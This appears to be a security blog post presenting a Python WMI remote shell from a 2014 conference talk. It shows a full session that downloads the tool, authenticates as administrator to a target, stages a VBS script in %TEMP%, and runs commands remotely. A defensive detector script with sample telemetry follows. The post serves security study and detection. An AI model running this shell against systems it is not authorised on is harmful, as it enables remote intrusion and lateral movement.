[hacking tricks] A full-featured WMI shell

Thanks to the efforts of Andrei Dumitrescu, a full-featured WMI shell written in Python has appeared. The tool was developed for Andrei's talk at #HES2014 [ http://2014.hackitoergosum.org/ ], which is taking place right now.

The presentation can be viewed at the following link [ here ].


root@bt:/tmp# wget https://www.lexsi.fr/conference/wmi-shell.zip
root@bt:/tmp# unzip wmi-shell.zip
Archive: wmi-shell.zip
creating: wmi-shell/
inflating: wmi-shell/LICENSE
inflating: wmi-shell/wmi-shell.py
inflating: wmi-shell/README
inflating: wmi-shell/base.vbs
creating: wmi-shell/bin/
inflating: wmi-shell/bin/base64.c
inflating: wmi-shell/bin/base64.exe
inflating: wmi-shell/bin/wmis
inflating: wmi-shell/bin/wmic
creating: wmi-shell/b64-source/
inflating: wmi-shell/b64-source/base64.exe
inflating: wmi-shell/b64-source/base64.c
root@bt:/tmp# cd wmi-shell/
root@bt:/tmp/wmi-shell# python wmi-shell.py administrator password 10.1.37.134
Sending our VBS script to 10.1.37.134 ETA: ~6.4 seconds.
Executed command --> ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c echo Function base64_encode( byVal strIn ) >>%TEMP%\E2BpK7z.vbs" 2>/dev/null <-- . Returned code: 1
...
Executed command --> ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c echo End Select >>%TEMP%\E2BpK7z.vbs" 2>/dev/null <-- . Returned code: 1
>>> dir C:
Executed command --> ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c cscript %TEMP%\E2BpK7z.vbs "dir C:"" 2>/dev/null <-- . Returned code: 1
Executed command --> ./bin/wmic -U "administrator"%"password" //10.1.37.134 --namespace='root\default' "select Name from __Namespace where Name like 'DOWNLOAD_READY'" > bSKFiy5_ready.tmp <-- . Returned code: 0
waiting for command output . . Executed command --> ./bin/wmic -U "administrator"%"password" //10.1.37.134 --namespace='root\default' "select Name from __Namespace where Name like 'DOWNLOAD_READY'" > bSKFiy5_ready.tmp <-- . Returned code: 0
. done !
Executed command --> ./bin/wmic -U "administrator"%"password" //10.1.37.134 --namespace='root\default' "select Name from __Namespace where Name like 'EVILTAG%'" > bSKFiy5.tmp <-- . Returned code: 0
Volume in drive C has no label.
Volume Serial Number is 8E25-9E63

Directory of C:

14.07.2009 07:20 <DIR> PerfLogs
19.04.2014 03:12 <DIR> Program Files
19.04.2014 22:04 <DIR> Program Files (x86)
19.04.2014 03:05 <DIR> Users
20.04.2014 04:19 <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 82 326 290 432 bytes free
Executed command --> ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c cscript %TEMP%\E2BpK7z.vbs "cleanup"" 2>/dev/null <-- . Returned code: 1
>>>
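The session above also shows what the technique looks like from the defender's side: every line of the VBS helper is written with a separate `cmd /c echo ... >>%TEMP%\X.vbs` process, the script is then run with `cscript`, and, because the processes are created through WMI, each one is a child of WmiPrvSE.exe. The following detector is an added example, not part of the original post or of Andrei Dumitrescu's wmi-shell; it runs over constructed process-creation records (the pipe-delimited `timestamp|host|parent image|image|command line` layout is an assumption, and host names, timestamps and the script name are made up) and raises one alert per host and script when WmiPrvSE.exe spawns a burst of such echo writes, noting whether the staged script was subsequently executed.

```python
"""Flag the wmi-shell staging pattern in process-creation telemetry.

Added example, not part of the original post or of wmi-shell itself.
The record layout (timestamp|host|parent image|image|command line) is an
assumption; map the fields from Sysmon Event ID 1 or Security 4688 as needed.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class ProcEvent:
    ts: datetime
    host: str
    parent_image: str
    image: str
    cmdline: str


# Constructed sample telemetry: the command lines mirror the session above,
# while host names, timestamps and the .vbs names are made up for the example.
SAMPLE_LOG = r"""
2014-04-24T10:15:01|WS01|C:\Windows\System32\wbem\WmiPrvSE.exe|C:\Windows\System32\cmd.exe|cmd /c echo Function base64_encode( byVal strIn ) >>%TEMP%\E2BpK7z.vbs
2014-04-24T10:15:02|WS01|C:\Windows\System32\wbem\WmiPrvSE.exe|C:\Windows\System32\cmd.exe|cmd /c echo Dim i >>%TEMP%\E2BpK7z.vbs
2014-04-24T10:15:04|WS01|C:\Windows\System32\wbem\WmiPrvSE.exe|C:\Windows\System32\cmd.exe|cmd /c echo End Function >>%TEMP%\E2BpK7z.vbs
2014-04-24T10:15:07|WS01|C:\Windows\System32\wbem\WmiPrvSE.exe|C:\Windows\System32\cmd.exe|cmd /c echo End Select >>%TEMP%\E2BpK7z.vbs
2014-04-24T10:15:30|WS01|C:\Windows\System32\wbem\WmiPrvSE.exe|C:\Windows\System32\cmd.exe|cmd /c cscript %TEMP%\E2BpK7z.vbs "dir C:"
2014-04-24T10:15:41|WS01|C:\Windows\System32\wbem\WmiPrvSE.exe|C:\Windows\System32\cmd.exe|cmd /c cscript %TEMP%\E2BpK7z.vbs "cleanup"
2014-04-24T11:02:00|WS02|C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd /c echo MsgBox 1 >>%TEMP%\test.vbs
2014-04-24T11:05:00|WS03|C:\Windows\System32\wbem\WmiPrvSE.exe|C:\Windows\System32\cmd.exe|cmd /c echo x >>%TEMP%\lone.vbs
"""

WMI_HOST_PROCESS = "wmiprvse.exe"  # processes created via Win32_Process.Create hang off this
ECHO_TO_TEMP_VBS = re.compile(r'^cmd\s+/c\s+echo\b.*>>\s*%TEMP%\\(?P<name>[^\s"\\]+\.vbs)\s*$', re.I)
CSCRIPT_TEMP_VBS = re.compile(r'cscript\s+%TEMP%\\(?P<name>[^\s"\\]+\.vbs)', re.I)


def parse_log(text):
    """Turn the pipe-delimited sample records into ProcEvent objects."""
    events = []
    for line in text.strip().splitlines():
        ts, host, parent, image, cmdline = line.split("|", 4)
        events.append(ProcEvent(datetime.fromisoformat(ts), host, parent, image, cmdline))
    return events


def is_wmi_spawned(ev):
    """True when the parent image's file name is WmiPrvSE.exe (case-insensitive)."""
    return ev.parent_image.lower().rsplit("\\", 1)[-1] == WMI_HOST_PROCESS


def detect_wmi_shell_staging(events, window=timedelta(seconds=60), min_lines=3):
    """One alert per (host, script) where WmiPrvSE.exe spawned at least
    `min_lines` 'cmd /c echo ... >>%TEMP%\\X.vbs' processes within `window`.
    Each alert also lists any cscript invocations of that staged script."""
    staged = defaultdict(list)    # (host, script) -> timestamps of echo writes
    executed = defaultdict(list)  # (host, script) -> cscript command lines
    for ev in sorted(events, key=lambda e: e.ts):
        if not is_wmi_spawned(ev):
            continue  # interactive cmd.exe children of explorer.exe etc. are out of scope
        m = ECHO_TO_TEMP_VBS.search(ev.cmdline)
        if m:
            staged[(ev.host, m["name"].lower())].append(ev.ts)
            continue
        m = CSCRIPT_TEMP_VBS.search(ev.cmdline)
        if m:
            executed[(ev.host, m["name"].lower())].append(ev.cmdline)

    alerts = []
    for key, stamps in staged.items():
        # sliding window over the sorted timestamps: any run of min_lines echoes inside `window`
        burst = any(stamps[i + min_lines - 1] - stamps[i] <= window
                    for i in range(len(stamps) - min_lines + 1))
        if burst:
            alerts.append({"host": key[0], "script": key[1],
                           "echo_lines": len(stamps),
                           "executed": executed.get(key, [])})
    return alerts


def run_sample():
    """Run the detector over the constructed telemetry above."""
    return detect_wmi_shell_staging(parse_log(SAMPLE_LOG))


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

On the sample data only WS01 is reported: WS02's echo comes from an interactive shell under explorer.exe, and WS03 has a single WMI-spawned write, below the burst threshold. The `__Namespace` instances the tool creates under root\default as its output channel (the `DOWNLOAD_READY` and `EVILTAG%` names in the transcript) are a second artifact worth enumerating on a host that trips this rule.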

